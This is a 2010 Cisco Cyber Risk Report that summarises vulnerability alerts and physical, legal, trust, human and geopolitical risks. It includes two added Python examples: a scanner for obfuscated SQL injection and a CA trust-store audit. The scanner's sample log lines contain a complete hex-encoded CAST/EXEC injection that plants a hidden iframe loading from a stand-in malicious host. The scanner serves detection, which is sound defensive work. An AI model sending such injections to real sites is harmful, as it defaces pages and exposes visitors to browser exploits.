The Cyber Risk Report is a strategic intelligence product that highlights current security activity and mid- to long-range perspectives. The report addresses seven major risk management categories: vulnerability, physical, legal, trust, identity, human, and geopolitical. Cyber Risk Reports are powered by Cisco Security Intelligence Operations, an advanced security infrastructure that identifies, analyzes, and defends against threats to keep organizations informed and protected. Cyber Risk Reports are the collaborative efforts of Cisco security analysts from the following teams: IntelliShield, Applied Intelligence, Remote Management Services, Intrusion Prevention System Signature Development, Cisco Product Security Incident Response, Cisco Malware Research, Strategic Technology Assessment Team, Infrastructure Security Research & Development, IronPort Email and Web Threat Research, Critical Infrastructure Assurance Group, Advanced Services, Security Sales and Engineering, Corporate Security Programs, Government Affairs, and Legal Support.
Vulnerability
Vulnerability activity for the period decreased from the previous period. The period was highlighted by security advisories and updates for vulnerabilities in IBM Tivoli Storage Manager and Red Hat Enterprise Virtualization Hypervisor, and by additional Microsoft vulnerabilities not covered in the previous week's monthly security bulletins. Cisco released a security advisory for a vulnerability in the Wireless Control System that could allow an unauthenticated, remote attacker to conduct cross-site scripting attacks, reported in IntelliShield alert 21123. Adobe released two security advisories for vulnerabilities in Adobe Reader and Acrobat, reported in IntelliShield alerts 21093 and 20294.
Security researcher Rafal Wojtczuk released a paper detailing a local attack against the Linux kernel that may result in arbitrary code execution with elevated privileges. Although the underlying vulnerability has been publicly discussed since as early as 2004, the recent attention created by Wojtczuk's paper has resulted in a fix in the Linux kernel. This issue has been assigned CVE-2010-2240 and was discussed in IntelliShield Alert 21169.
Recent SQL injection attack activity has been gaining media attention after successfully affecting pages on the apple.com website. These attacks continue the current trend in which attackers use SQL injection to add malicious content to legitimate web pages, often hidden iframes that attempt to exploit unpatched vulnerabilities in visitors' browsers; the injected SQL statements are obfuscated to evade detection and filtering.
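The obfuscation described above is typically a hex literal wrapped in CAST(...), so a request that never contains the words UPDATE or iframe still injects them. The following added example (not part of the original report) shows a detection pass over constructed web-server log lines: it decodes long hex literals in the query string, handling both the single-byte and the UTF-16LE (NVARCHAR) encodings, and flags requests whose decoded payload carries SQL keywords or an injected tag. The log lines, the injected statement and the host name malicious.example are constructed for the example.

```python
import re
import urllib.parse
# Constructed sample data (not real traffic). The injected statement appends a hidden
# iframe to stored page content; mass-injection attacks ship it as a hex literal inside
# CAST(...) so that keyword filters never see the words UPDATE or iframe in the request.
INJECTED_SQL = ("UPDATE pages SET body=body+'<iframe src=\"http://malicious.example/x\""
                " width=0 height=0></iframe>'")
HEX_ASCII = "0x" + INJECTED_SQL.encode("latin-1").hex()
HEX_UTF16 = "0x" + INJECTED_SQL.encode("utf-16-le").hex()   # NVARCHAR variant
def _log(query):
    return f'10.0.0.9 - - [20/Aug/2010:10:01:07 +0000] "GET {query} HTTP/1.1" 200 5120'

SAMPLE_LOG = [
    _log("/products.asp?id=42"),
    _log("/products.asp?id=42;DECLARE%20@s%20VARCHAR(4000);SET%20@s=CAST("
         + HEX_ASCII + "%20AS%20VARCHAR(4000));EXEC(@s);--"),
    _log("/products.asp?id=42;DECLARE%20@s%20NVARCHAR(4000);SET%20@s=CAST("
         + HEX_UTF16 + "%20AS%20NVARCHAR(4000));EXEC(@s);--"),
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{16,})")   # long hex literals only
SQL_KEYWORDS = re.compile(r"\b(declare|cast|exec|update|set|varchar|nvarchar)\b", re.I)
INJECTED_TAG = re.compile(r"<(iframe|script)\b", re.I)

def decode_hex_literals(text):
    """Decode each long hex literal; use UTF-16LE when every odd byte is NUL."""
    decoded = []
    for h in HEX_LITERAL.findall(text):
        raw = bytes.fromhex(h[: len(h) - len(h) % 2])   # drop a dangling nibble
        if raw and not any(raw[1::2]):
            decoded.append(raw.decode("utf-16-le", "replace"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded

def analyze_line(line):
    """Findings for one access-log line, or None if it carries no request."""
    m = REQUEST.search(line)
    if not m:
        return None
    query = urllib.parse.unquote_plus(m.group(1))        # undo %20 / + encoding
    payloads = decode_hex_literals(query)
    visible = query + " " + " ".join(payloads)           # request plus decoded text
    keywords = sorted({k.lower() for k in SQL_KEYWORDS.findall(visible)})
    injected = INJECTED_TAG.search(visible) is not None
    return {"hex_literals": len(payloads), "sql_keywords": keywords,
            "injected_tag": injected, "decoded": payloads,
            "suspicious": bool(payloads) and (injected or len(keywords) >= 2)}

def scan(lines):
    """Return (line, findings) for every suspicious line."""
    results = [(ln, analyze_line(ln)) for ln in lines]
    return [(ln, f) for ln, f in results if f and f["suspicious"]]
```

Matching on the decoded payload rather than the raw request is what makes the check robust to the encoding; a filter that only inspects the raw query string sees nothing but a hex string.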
IntelliShield published 99 events last week: 39 new events and 60 updated events. Of the 99 events, 75 were Vulnerability Alerts, 10 were Security Activity Bulletins, two were Security Issue Alerts, 10 were Threat Outbreak Alerts, one was an Applied Mitigation Bulletin, and one was a Cyber Risk Report. The alert publication totals are as follows:
Weekly Alert Totals
Significant Alerts for August 16–22, 2010
Adobe Acrobat and Reader cooltype.dll Remote Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 21093, Version 4, August 20, 2010
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2010-2862
Adobe Acrobat and Reader contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on the targeted system. Proof-of-concept code that demonstrates an exploit of this vulnerability is publicly available. Adobe has confirmed this vulnerability and software updates are available.
Multiple Vendor PDF Viewer /launch Program Execution Attack
IntelliShield Vulnerability Alert 20294, Version 3, August 20, 2010
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2010-1240
Adobe has released a security bulletin and updated software to address the multiple vendor PDF viewer /launch program execution attack.
Previous Alerts That Still Represent Significant Risk
Microsoft Windows Win32k Kernel Driver Window Creation Privilege Escalation Vulnerability
IntelliShield Vulnerability Alert 21027, Version 3, August 12, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-1897
Exploits of the Microsoft Windows Win32k kernel driver window creation privilege escalation vulnerability are currently being observed in the wild.
Microsoft Windows XML Core Services Response Handling Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 21021, Version 2, August 11, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-2561
Proof-of-concept code that exploits the Microsoft Windows XML core services response handling arbitrary code execution vulnerability is publicly available. The alert update also indicates an increase in the urgency.
Microsoft Windows Tracing Feature for Services Registry Key Access Control Lists Privilege Escalation Vulnerability
IntelliShield Vulnerability Alert 21018, Version 3, August 11, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-2554
Exploits are currently being observed in the wild. Microsoft is aware of an increase in the number of targeted attacks that use the readily available exploit code.
Microsoft Windows Server Message Block Packet Processing Pool Overflow Remote Code Execution Vulnerability
IntelliShield Vulnerability Alert 21014, Version 4, August 11, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-2550
Exploits are currently being observed in the wild. Microsoft is aware of an increase in the number of targeted attacks that leverage the readily available exploit code.
Microsoft Windows Kernel Win32k Driver Exception Handling Privilege Escalation Vulnerability
IntelliShield Vulnerability Alert 21024, Version 2, August 11, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-1894
Proof-of-concept code that demonstrates an exploit of the Microsoft Windows Kernel Win32k driver exception handling privilege escalation vulnerability is publicly available. This updated alert indicates an increase in the urgency.
Microsoft Windows .lnk File Processing Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 20918, Version 4, August 2, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-2568
Microsoft has released a security bulletin and updates to address the Windows .lnk file processing arbitrary code execution vulnerability.
Microsoft Windows .lnk File Vulnerability Used for Malware Outbreak Targeting SCADA Systems
IntelliShield Vulnerability Alert 20915, Version 5, August 2, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-2568
Microsoft has released a security bulletin along with software updates to address the vulnerability exploited by malicious software.
Microsoft Windows Help and Support Center Whitelist Bypass Vulnerability
IntelliShield Vulnerability Alert 20691, Version 6, July 15, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-1885
Exploits of the Microsoft Windows Help and Support Center whitelist bypass vulnerability are being observed in the wild. Functional code that exploits this vulnerability is publicly available. Microsoft has confirmed this vulnerability in a security bulletin and released updated software.
DNSSEC-Enabled Queries to the DURZ Serving Root May Affect DNS Services
IntelliShield Vulnerability Alert 20418, Version 2, July 15, 2010
Urgency/Credibility/Severity Rating: 2/5/3
Signed root DNS zones are designated to go into effect during a maintenance window July 15, 2010, establishing the availability of DNSSEC-enabled queries.
Multiple Adobe Products Remote Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 20625, Version 7, July 1, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-1297
Multiple Adobe products contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on the targeted system or cause a denial of service (DoS) condition. Functional code that exploits this vulnerability is available. Adobe has confirmed this vulnerability and released updated software.
IBM and Oracle Java Web Start Java Development Kit ActiveX Control Command-Line Injection Vulnerability
IntelliShield Vulnerability Alert 20314, Version 6, July 29, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-0886, CVE-2010-0887, CVE-2010-1423
Oracle Java contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands on the system with the privileges of the user. Systems with Oracle Java JRE and JDK 6 Update 10 and later contain the affected ActiveX control and are vulnerable. Red Hat has released an additional security advisory and updated packages to address the Oracle Java Web Start Java Development Kit ActiveX control command-line injection vulnerability.
Transport Layer Security Renegotiation Remote Man-in-the-Middle Attack Vulnerability
IntelliShield Vulnerability Alert 19361, Version 61, August 10, 2010
Urgency/Credibility/Severity Rating: 2/5/3
CVE-2009-3555
Multiple Transport Layer Security (TLS) implementations contain a vulnerability when renegotiating a TLS session that could allow an unauthenticated, remote attacker to conduct a man-in-the-middle attack. Proof-of-concept code that exploits this vulnerability is publicly available. HP has released an additional security bulletin and updated software to address the Transport Layer Security renegotiation remote man-in-the-middle attack vulnerability.
Physical
Fires and Heat in Western Russia Cause Grain Shortages
Wildfires continue to burn in areas of western Russia around the capital city of Moscow. Although cooler weather is expected for the affected areas, the damage has already been done. As a result of grain crops affected by fires and adverse weather, Russian government officials have proposed an export ban to stop rising prices inside the country. The ban could affect trading partners, such as Egypt, that rely heavily upon Russian grain exports.
IntelliShield Analysis: Grain shortages in Russia have already affected prices worldwide and may raise food prices overall. However, price indexes are still lower than they were in 2008, when unrest occurred in countries dependent upon exports. Additionally, concern over stability in Russia and the government's ability to respond to emerging disasters may curb foreign investment in Russian infrastructure and development. However, the crisis may create other opportunities for foreign businesses that are willing to accept the risks of entering into new deals in Russia.
Legal
Subscriber Information from Bankrupt Magazine to be Destroyed
After XY magazine declared bankruptcy, its subscriber information was one asset over which business partners disputed ownership; the parties have since decided to destroy the information. The information, which contained personal details of subscribers, was originally covered by a privacy policy that prevented its transfer to a third party. During the dispute, the Federal Trade Commission indicated that failure to uphold the privacy policy's prohibition on transfer could constitute an unfair trade practice.
IntelliShield Analysis: Information is a valuable asset in technology mergers and acquisitions, and privacy policies may become increasingly important for socially enabled online companies. Users may continue to push organizations to adopt more stringent privacy policies to protect their individual rights. However, such policies may create problems for companies looking to be purchased by bigger companies in their markets, because the transferability of that information may be an intrinsic factor in the company's value. As more information is collected to provide tailored user experiences and advertising, organizations can expect the value of, and the details in, privacy policies to become more important, not only for operational purposes but also for the long-term transfer and disposal of that data and the value it retains. Cisco first covered this topic in the July 12-18, 2010 Cyber Risk Report.
Trust
Silent Update Feature Added to Firefox
Mozilla is expected to follow in Google's footsteps by implementing a silent update feature in Firefox version 4 when it is released. According to a recent posting, the feature would apply only to minor updates (e.g. version 3.7, 3.8, etc.) of Firefox; users would still be prompted to agree to updates to major versions (e.g. version 4, 5, etc.).
IntelliShield Analysis: There will be those in the user community who take offense at this approach, in which updates to software and applications on machines in a user's possession are made without the express permission of the user, since the user has sole authority over the software installed on their computer. On the other hand, many in the security community will agree with this direction because it enhances the overall security of end hosts without depending on the decision making of end users, many of whom simply do not know the technical details of end-host vulnerabilities, do not understand the extent of the potential impact on the Internet when these vulnerabilities are exploited, and lack insight into how these updates and patches protect end hosts and the Internet as a whole.
Identity
There was no significant activity in this category during the time period.
Human
Electronic Frontier Foundation Warns of Untrustworthy SSL, Undetectable Surveillance
In an open letter, the Electronic Frontier Foundation (EFF) asked Verizon to consider revoking the authority that Verizon issued to Etisalat to certify web sites. Etisalat is the telecommunications company in the United Arab Emirates that issued an update to BlackBerry users containing surveillance software and that more recently threatened to discontinue BlackBerry service; its stated reason for the recent action is Research In Motion's refusal to allow surveillance back doors in BlackBerry software. Using the certificates received from Verizon, Etisalat has the ability to issue trusted certificates for any website, including those already in existence. Such impostor websites would be implicitly trusted by Internet Explorer and Firefox without any warning presented to the user.
IntelliShield Analysis: Most users implicitly trust encrypted web sites and the Certificate Authorities (CAs) that issue the digital certificates on which trusted encryption depends. We regularly connect to online banking sites, e-commerce sites, and other sites into which we enter personal information, and we are confident that the website belongs to who we think it does when no browser warnings are presented. But should we implicitly trust the certifying authorities? The issue of due diligence by each and every CA is a huge concern. Have the issuing CAs adequately verified the organization requesting the certificate? The EFF has mapped over 650 organizations that can issue certificates trusted by the default configurations of Microsoft's Internet Explorer and Mozilla's Firefox browsers, and has begun the SSL Observatory Project to investigate the certificates used to secure encrypted websites. There is an old Latin question, "Quis custodiet ipsos custodes?", which translates as "Who watches the watchers?" In this case it may be the SSL Observatory Project. Users and organizations need to take a more active role in determining which certificates they will trust and which they will not accept.
To view the installed certificates (and information about the issuing CA), perform the following steps in your browser. In Internet Explorer, from the Tools menu choose Internet Options, then the Content tab, and then the Certificates button. In Firefox, open the Preferences menu and select the Advanced tab, then the Encryption tab, and finally the View Certificates button.
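The browser dialogs above show the trust store one entry at a time; the audit the analysis calls for is easier to repeat programmatically. The following added example (not from the original report) works on entries in the shape Python's ssl.SSLContext.get_ca_certs() returns, counts how many distinct organizations a client trusts by default, flags expired roots and roots from organizations on a local distrust list, and builds a client context that trusts only a curated bundle instead of the system store. The sample store entries and organization names are constructed for the example.

```python
import ssl
import time

# Constructed sample entries (not a real trust store) in the shape that
# ssl.SSLContext.get_ca_certs() returns: names are tuples of RDN tuples.
def _ca(org, cn, not_after):
    name = ((("organizationName", org),), (("commonName", cn),))
    return {"subject": name, "issuer": name, "notAfter": not_after, "version": 3}

SAMPLE_STORE = [
    _ca("Example Root CA Ltd", "Example Root", "Jan  1 00:00:00 2035 GMT"),
    _ca("Example Root CA Ltd", "Example Root G2", "Jan  1 00:00:00 2040 GMT"),
    _ca("Legacy Certs Inc", "Legacy Root", "Jan  1 00:00:00 2009 GMT"),   # expired
    _ca("Untrusted Telecom", "Untrusted Telecom Root", "Jan  1 00:00:00 2030 GMT"),
]

def _field(name, key):
    """Pull one attribute (e.g. organizationName) out of an RDN tuple."""
    for rdn in name:
        for k, v in rdn:
            if k == key:
                return v
    return ""

def audit_trust_store(certs, distrusted_orgs, now=None):
    """Count the organizations a client trusts by default and flag CAs to remove."""
    now = time.time() if now is None else now
    block = {o.lower() for o in distrusted_orgs}
    orgs, expired, distrusted = set(), [], []
    for c in certs:
        org = _field(c["subject"], "organizationName")
        cn = _field(c["subject"], "commonName")
        orgs.add(org)
        if ssl.cert_time_to_seconds(c["notAfter"]) < now:
            expired.append(cn)            # still in the store, but no longer valid
        if org.lower() in block:
            distrusted.append(cn)         # trusted by default, not by your policy
    return {"total": len(certs), "organizations": len(orgs),
            "expired": expired, "distrusted": distrusted}

def system_store_report(distrusted_orgs):
    """Run the same audit against this machine's default CA store. The list can be
    empty where OpenSSL loads CAs lazily from a directory rather than a bundle file."""
    return audit_trust_store(ssl.create_default_context().get_ca_certs(), distrusted_orgs)

def restricted_context(ca_bundle_path):
    """TLS client context that trusts only a curated CA bundle, not the system store."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.check_hostname = True
    ctx.load_verify_locations(cafile=ca_bundle_path)
    return ctx
```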
Geopolitical
Mexico Security Situation Worsens
A new surge of drug-related violence in the affluent business center of Monterrey, punctuated by the murder of the mayor of nearby Santiago, has brought Mexico's drug-related violence back into the headlines. Monterrey, until now a relatively safe city, has been the site of gun battles in recent weeks as two rival drug cartels fight for the upper hand. Business leaders purchased full-page ads in prominent newspapers last week, urging President Calderon to send troops to restore order. At the same time, President Calderon met with regional public officials in an effort to examine possible new strategies, as the death toll since Calderon launched his counter-narcotics campaign in 2006 topped 28,000.
IntelliShield Analysis: The fact that drug-related violence has surged in Monterrey, several hours' drive from the U.S. border and far from key drug transit ports, is of particular concern. The Wall Street Journal speculated that the Monterrey violence shows that the drug war has moved literally onto the doorsteps of wealthy drug lords, some of whom live in the city's affluent neighborhoods. There remains little evidence that multinational companies or expatriates have been targeted, but employees caught in the wrong place at the wrong time run the risk of kidnapping, robbery, or worse. Hopes are high that economic recovery will take some pressure off the drug trade by providing more legitimate jobs for young Mexicans. However, with another year left in President Calderon's term, chances are that drug-related violence will continue. Maintaining a strong physical security stance will be crucial for companies doing business in Mexico, particularly in border regions.
Upcoming Security Activity
VMWorld: August 30-September 3, 2010
InterOp NY: October 18-22, 2010
Because of the potential for increased risk on multiple vectors, organizations' security teams should be aware of and consider making special preparations for the following dates:
World Expo (Shanghai, China): May 1-October 31, 2010
Ramadan: August 11-September 8, 2010
Additional Information
For more information about the vulnerabilities contained in this report or the Cisco Security IntelliShield Alert Manager Service, please visit Cisco Security IntelliShield Alert Manager Service.
For information on obtaining a free trial of the Cisco Security IntelliShield Alert Manager Service, please visit Trial Registration.
This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document at any time.